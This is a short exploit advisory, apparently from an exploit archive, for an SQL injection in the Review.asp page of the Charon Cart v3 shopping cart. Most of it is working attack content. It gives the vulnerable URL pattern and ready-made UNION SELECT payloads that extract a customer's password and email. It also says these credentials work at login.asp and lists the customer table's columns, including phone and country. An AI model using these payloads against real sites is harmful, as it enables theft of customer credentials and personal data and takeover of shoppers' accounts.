|
Vulnerability Report=0D
*******************************************************************************=0D
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability=0D
=0D
# Author : ajann=0D
=0D
# Script Page : http://www.charon.co.uk=0D
=0D
# Exploit;=0D
=0D
*******************************************************************************=0D
=0D
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]=0D
=0D
Example: =0D
=0D
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201=0D
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201=0D
Email and Password ==> login.asp [L0gin P4Ge]=0D
=0D
Columns;=0D
"""""""""""""""""""""=0D
CustomerID=0D
"""""""""""""""""""""=0D
CustomerEmail=0D
"""""""""""""""""""""=0D
CustomerPassword=0D
"""""""""""""""""""""=0D
ShipCountry=0D
"""""""""""""""""""""=0D
Phone=0D
"""""""""""""""""""""=0D
.........=0D
"""""""""""""""""""""=0D
....=0D
"""""""""""""""""""""=0D
# ajann,Turkey=0D
# ...=0D
# Im not Hacker!=0D